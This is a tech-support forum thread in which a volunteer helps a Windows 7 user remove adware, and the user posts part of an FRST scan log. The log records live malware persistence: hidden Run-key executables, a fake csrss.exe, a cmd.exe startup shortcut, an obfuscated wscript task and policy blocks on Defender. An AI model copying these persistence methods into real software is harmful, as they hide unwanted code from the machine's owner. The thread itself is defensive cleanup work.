1. Computer problem? Tech Support Guy is completely free -- paid for by advertisers and donations. Click here to join today! If you're new to Tech Support Guy, we highly recommend that you visit our Guide for New Members.

In Progress Google adware

Discussion in 'Virus & Other Malware Removal' started by nekoshoyo, Jul 9, 2019.

Thread Status:
Not open for further replies.
Advertisement
  1. nekoshoyo

    nekoshoyo Thread Starter

    Joined:
    Jul 9, 2019
    Messages:
    12
    Hi there, this is my first time coming on this website (or any tech support website for that matter), so sorry for any apparent inexperience. I'm a windows 7 user. Recently my little brother downloaded something off the internet without consulting me, and malware was downloaded onto it, called Cloudnet. I have managed to uninstall it and all other peripheral software that was downloaded onto my computer, manually and through malwarebytes (on trial).

    I had thought everything would be fine now, but ads keep popping on google every other time I click anywhere. Earlier windows would open up on their own, that's stopped, but clicking anywhere with a mouse causes ads and other websites to open up. I've tried resetting google settings as well as clearing all cookies, extensions etc., but the problem still isn't going away. I'm not really sure what's the problem, but maybe it has something to do with the "managed by your organization" status that has popped up for me, right after the malware was downloaded onto the computer. However, I have no idea whatsoever about what I should do to remove it. Also, when I try to run window's search for spyware or other suspicious software, it says the "group policy" doesn't allow it. Hope someone can help, thanks!

    https://prnt.sc/ockw7g
    https://prnt.sc/ockwpu
    https://prnt.sc/ocl6bj
     
  2. iMacg3

    iMacg3 Malware Specialist

    Joined:
    Nov 3, 2018
    Messages:
    561
    Hi nekoshoyo, Welcome to the Tech Support Guy malware removal forum.

    I am iMacg3 and will be helping you with your computer problems.

    Please keep the following information in mind before we begin:
    • Back up any important data before we continue.
      • Back up any important data on your computer to external media. I will not knowingly suggest any steps that will damage your computer; however, malware infections are often unpredictable and it may be necessary to reformat and reinstall your operating system depending on the infection.
    • Do not run any fixes or tools on your system unless I request that you do so.
      • Running additional tools on your system can interfere with the clean-up process, or cause issues such as false positives.
    • Please read all instructions carefully, and complete them in the order listed.
      • Items that are especially important will be highlighted in bold or red.
    • If your computer seems to start working normally, please don't abandon the topic.
      • Even if your system is behaving normally, there may still be some malware remnants left over. Additionally, malware can re-infect the computer if some remnants are left. Therefore, please complete all requested steps to make sure any malware is successfully eradicated from your PC.
    • If you have pirated or illegal software on your computer, uninstall it now before proceeding.
      • Using pirated/cracked software is an easy way to infect your computer - almost as easy as intentionally downloading malware. Therefore, please remove any, if present, before we begin the clean-up.
    • If you have questions at any time during the cleanup, feel free to ask.

    ---------------------------------------------------
    Farbar Recovery Scan Tool (FRST)

    Download Farbar Recovery Scan Tool and save it to your desktop.

    Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, and that will be the right version.
    • Right-click FRST.exe/FRST64.exe then click "Run as administrator" (XP users: double-click on the file).
    • When the tool opens, click Yes to the disclaimer.
    • Press the Scan button.
    • When finished, it will produce logs called FRST.txt and Addition.txt in the same directory the tool was run from.
    • Please copy and paste the logs in your next reply.

    ---------------------------------------------------

    In your next reply, please include:
    • FRST.txt
    • Addition.txt
     
  3. nekoshoyo

    nekoshoyo Thread Starter

    Joined:
    Jul 9, 2019
    Messages:
    12
    Heres FRST.txt (Part 1):

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 3-07-2019
    Ran by ADMIN (administrator) on ADMIN-PC (INTEL_ DH61HO__) (10-07-2019 17:30:44)
    Running from C:\Users\ADMIN\Desktop
    Loaded Profiles: ADMIN & (Available Profiles: ADMIN & children)
    Platform: Windows 7 Ultimate (X64) Language: English (United States)
    Internet Explorer Version 8 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    () [File not signed] C:\ProgramData\Logic Cramble\set.exe
    () [File not signed] C:\Windows\windefender.exe
    (Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
    (Google Inc -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.34.11\GoogleCrashHandler.exe
    (Google Inc -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.34.11\GoogleCrashHandler64.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Huawei Technologies Co., Ltd.) [File not signed] C:\ProgramData\DatacardService\DCSHelper.exe
    (Logitech Inc -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\ArxApplets\Discord\logitechg_discord.exe
    (Logitech Inc -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
    (Logitech Inc -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
    (Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Microsoft Windows -> Microsoft Corporation) C:\Program Files (x86)\Internet Explorer\ielowutil.exe
    (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
    (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
    (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
    (Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
    (Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (TeamViewer -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
    (TODO: <Company name>) [File not signed] C:\ProgramData\CloudPrinter\CloudPrinter.exe

    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13667032 2014-02-19] (Realtek Semiconductor Corp -> Realtek Semiconductor)
    HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [18727048 2018-10-05] (Logitech Inc -> Logitech Inc.)
    HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [225944 2017-04-11] (OOO Lightshot -> )
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645456 2019-04-01] (Oracle America, Inc. -> Oracle Corporation)
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [Steam] => "E:\steam\steam.exe" -silent
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [uTorrent] => C:\Users\ADMIN\AppData\Roaming\uTorrent\uTorrent.exe [1837296 2019-06-30] (BitTorrent Inc -> BitTorrent Inc.)
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [EpicGamesLauncher] => "C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe" -silent
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [Chromium] => c:\users\admin\appdata\local\chromium\application\chrome.exe [828416 2017-01-21] (The Chromium Authors) [File not signed]
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3114256 2019-05-27] (Electronic Arts, Inc. -> Electronic Arts)
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [SummerDew] => "C:\Windows\rss\csrss.exe" <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [nSAAPfUJ4L.exe] => C:\Program Files\NVIDIA Corporation\MAK7CBDCE4NDDPY\nSAAPfUJ4L.exe
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [3158557] => "C:\Users\ADMIN\AppData\Local\Temp\is-GMNSA.tmp\ReadyFor.exe" /VERYSILENT <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [4166405] => "C:\Users\ADMIN\AppData\Roaming\eppsrq3otww\hykdgbc2yne.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [ZXMHTBNP7AK3TRL] => "C:\Program Files\S2SM7ZWF99\S2SM7ZWF9.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [SysHelper] => "C:\Users\ADMIN\AppData\Local\dc987dec-8cfa-49ee-8d5d-aa82c048178f\421F.tmp.exe" --AutoStart
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [7073823] => "C:\Users\ADMIN\AppData\Roaming\st1oaktw2ol\oohpkgd4ygp.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [01GFF9BFRDRUU24] => "C:\Program Files\9RIR0W407U\MGP68VA16.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [3285487] => "C:\Users\ADMIN\AppData\Roaming\nhhb4gpoag4\cntu5xc4avr.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [OX2EPEHB3K6HVZM] => "C:\Program Files\1B0ZGH03DT\1B0ZGH03D.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [ISYBWUOOMWPDFOI] => "C:\Program Files\A5H2CDJ5DL\A5H2CDJ5D.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [8384140] => "C:\Users\ADMIN\AppData\Roaming\yrgtajo5ceo\yumfmyl5hbk.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [CloudNet] => "C:\Users\ADMIN\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Policies\system: [LogonHoursAction] 2
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\MountPoints2: {915ba646-3592-11e8-8a07-eca86b72ed8f} - H:\AutoRun.exe
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\MountPoints2: {915ba64a-3592-11e8-8a07-eca86b72ed8f} - H:\AutoRun.exe
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [Steam] => "E:\steam\steam.exe" -silent
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [uTorrent] => C:\Users\ADMIN\AppData\Roaming\uTorrent\uTorrent.exe [1837296 2019-06-30] (BitTorrent Inc -> BitTorrent Inc.)
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [EpicGamesLauncher] => "C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe" -silent
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [Chromium] => c:\users\admin\appdata\local\chromium\application\chrome.exe [828416 2017-01-21] (The Chromium Authors) [File not signed]
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3114256 2019-05-27] (Electronic Arts, Inc. -> Electronic Arts)
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [SummerDew] => "C:\Windows\rss\csrss.exe" <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [nSAAPfUJ4L.exe] => C:\Program Files\NVIDIA Corporation\MAK7CBDCE4NDDPY\nSAAPfUJ4L.exe
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [3158557] => "C:\Users\ADMIN\AppData\Local\Temp\is-GMNSA.tmp\ReadyFor.exe" /VERYSILENT <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [4166405] => "C:\Users\ADMIN\AppData\Roaming\eppsrq3otww\hykdgbc2yne.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [ZXMHTBNP7AK3TRL] => "C:\Program Files\S2SM7ZWF99\S2SM7ZWF9.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [SysHelper] => "C:\Users\ADMIN\AppData\Local\dc987dec-8cfa-49ee-8d5d-aa82c048178f\421F.tmp.exe" --AutoStart
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [7073823] => "C:\Users\ADMIN\AppData\Roaming\st1oaktw2ol\oohpkgd4ygp.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [01GFF9BFRDRUU24] => "C:\Program Files\9RIR0W407U\MGP68VA16.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [3285487] => "C:\Users\ADMIN\AppData\Roaming\nhhb4gpoag4\cntu5xc4avr.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [OX2EPEHB3K6HVZM] => "C:\Program Files\1B0ZGH03DT\1B0ZGH03D.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [ISYBWUOOMWPDFOI] => "C:\Program Files\A5H2CDJ5DL\A5H2CDJ5D.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [8384140] => "C:\Users\ADMIN\AppData\Roaming\yrgtajo5ceo\yumfmyl5hbk.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Run: [CloudNet] => "C:\Users\ADMIN\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Policies\system: [LogonHoursAction] 2
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\MountPoints2: {915ba646-3592-11e8-8a07-eca86b72ed8f} - H:\AutoRun.exe
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\MountPoints2: {915ba64a-3592-11e8-8a07-eca86b72ed8f} - H:\AutoRun.exe
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [Steam] => "E:\steam\steam.exe" -silent
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [uTorrent] => C:\Users\ADMIN\AppData\Roaming\uTorrent\uTorrent.exe [1837296 2019-06-30] (BitTorrent Inc -> BitTorrent Inc.)
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [EpicGamesLauncher] => "C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe" -silent
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [Chromium] => c:\users\admin\appdata\local\chromium\application\chrome.exe [828416 2017-01-21] (The Chromium Authors) [File not signed]
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3114256 2019-05-27] (Electronic Arts, Inc. -> Electronic Arts)
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [SummerDew] => "C:\Windows\rss\csrss.exe" <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [nSAAPfUJ4L.exe] => C:\Program Files\NVIDIA Corporation\MAK7CBDCE4NDDPY\nSAAPfUJ4L.exe
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [3158557] => "C:\Users\ADMIN\AppData\Local\Temp\is-GMNSA.tmp\ReadyFor.exe" /VERYSILENT <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [4166405] => "C:\Users\ADMIN\AppData\Roaming\eppsrq3otww\hykdgbc2yne.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [ZXMHTBNP7AK3TRL] => "C:\Program Files\S2SM7ZWF99\S2SM7ZWF9.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [SysHelper] => "C:\Users\ADMIN\AppData\Local\dc987dec-8cfa-49ee-8d5d-aa82c048178f\421F.tmp.exe" --AutoStart
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [7073823] => "C:\Users\ADMIN\AppData\Roaming\st1oaktw2ol\oohpkgd4ygp.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [01GFF9BFRDRUU24] => "C:\Program Files\9RIR0W407U\MGP68VA16.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [3285487] => "C:\Users\ADMIN\AppData\Roaming\nhhb4gpoag4\cntu5xc4avr.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [OX2EPEHB3K6HVZM] => "C:\Program Files\1B0ZGH03DT\1B0ZGH03D.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [ISYBWUOOMWPDFOI] => "C:\Program Files\A5H2CDJ5DL\A5H2CDJ5D.exe"
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [8384140] => "C:\Users\ADMIN\AppData\Roaming\yrgtajo5ceo\yumfmyl5hbk.exe" /VERYSILENT
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Run: [CloudNet] => "C:\Users\ADMIN\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" <==== ATTENTION
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Policies\system: [LogonHoursAction] 2
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\MountPoints2: {915ba646-3592-11e8-8a07-eca86b72ed8f} - H:\AutoRun.exe
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\MountPoints2: {915ba64a-3592-11e8-8a07-eca86b72ed8f} - H:\AutoRun.exe
    HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-07102019173051773\...\Policies\system: [LogonHoursAction] 2
    HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{637FE20B-9A5B-4F51-B1BE-D10045625B40}-07102019173051773\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
    HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161658923\...\Policies\system: [LogonHoursAction] 2
    HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161658923\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
    HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161703507\...\Policies\system: [LogonHoursAction] 2
    HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161703507\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
    HKLM\...\Drivers32: [vidc.mjpg] => C:\Windows\system32\bdmjpeg64.dll [75248 2017-01-26] (Bandicam Company -> )
    HKLM\...\Drivers32: [vidc.mpeg] => C:\Windows\system32\bdmpegv64.dll [75272 2017-01-26] (Bandicam Company -> )
    HKLM\...\Drivers32: [msacm.bdmpeg] => C:\Windows\system32\bdmpega64.acm [75784 2017-01-26] (Bandicam Company -> )
    HKLM\...\Drivers32: [vidc.mjpg] => C:\Windows\SysWOW64\bdmjpeg.dll [71152 2017-01-26] (Bandicam Company -> )
    HKLM\...\Drivers32: [vidc.mpeg] => C:\Windows\SysWOW64\bdmpegv.dll [71176 2017-01-26] (Bandicam Company -> )
    HKLM\...\Drivers32: [msacm.bdmpeg] => C:\Windows\SysWOW64\bdmpega.acm [71176 2017-01-26] (Bandicam Company -> )
    HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-06-22] (Google LLC -> Google LLC)
    HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
    HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems, Inc.)
    Startup: C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cuebedbh.lnk [2019-07-09]
    ShortcutAndArgument: cuebedbh.lnk -> C:\Windows\System32\cmd.exe => /c start "" "C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\cuebedbh\atsfwaeb.exe"
    GroupPolicy: Restriction - Chrome <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    GroupPolicyUsers\S-1-5-21-3161437104-263828448-1275724104-1003\User: Restriction <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {001B6186-B9F4-4CCC-8B0C-5A0B2C8BE885} - System32\Tasks\mrAArNosEtAJT2 => C:\Windows\system32\wscript.exe "C:\ProgramData\JrsbweBqGiQFiyVB\ifuOxrb.wsf"
    Task: {05415D0C-CABB-4C68-A583-1908F354E7C0} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
    Task: {0E237A46-D40A-4229-92DB-821169F5C7D9} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {0E58AAF5-E621-4095-886F-EED72D34722B} - System32\Tasks\update-S-1-5-21-3161437104-263828448-1275724104-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
    Task: {11EE3D86-DD42-4287-AB72-91B6550F8885} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {13758B1C-CCCE-40FB-90DC-73EA63748EA5} - System32\Tasks\{C287A332-65DB-4AC3-A344-FE668FB44526} => C:\Windows\system32\pcalua.exe -a C:\Users\ADMIN\Desktop\LeagueofLegends_NA_Installer_2016_05_13.exe -d C:\Windows\SysWOW64 -c /groupsextract:100; /out:"C:\Users\ADMIN\AppData\Roaming\Riot Games\League of Legends\prerequisites" /callbackid:5836
    Task: {1513EEE8-5F6F-4053-A936-F22E9785E602} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-05] (Google Inc -> Google Inc.)
    Task: {1CDADE97-157F-4041-AB72-EA9B115EA1F2} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe
    Task: {2E2C8219-5A6F-49A9-BA63-C875F291F6E4} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645456 2019-04-01] (Oracle America, Inc. -> Oracle Corporation)
    Task: {35285663-7DD7-4E11-B167-1D353FF1E149} - System32\Tasks\Online Application V2G6 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {3A251981-B8E1-4DA9-AA55-A0B4BADA6873} - System32\Tasks\{B7E4FFCD-3871-411A-A449-6E0BC062B522} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\ZerStatlex\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\ZerStatlex\uninstall.dat" -a uninstallme 258B13B8-A31B-451A-AAAC-54F4EDF196A6 DeviceId=c5ba6c44-869d-0d4f-b5e8-7ac9b48167df BarcodeId=51198003 ChannelId=003 DistributerName=APSFWakeNet
    Task: {3B704672-6F66-4908-9CF2-DF44D6900E1C} - System32\Tasks\{7972A67A-3156-4A41-831E-C7B5A38C6522} => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win32\EpicGamesLauncher.exe
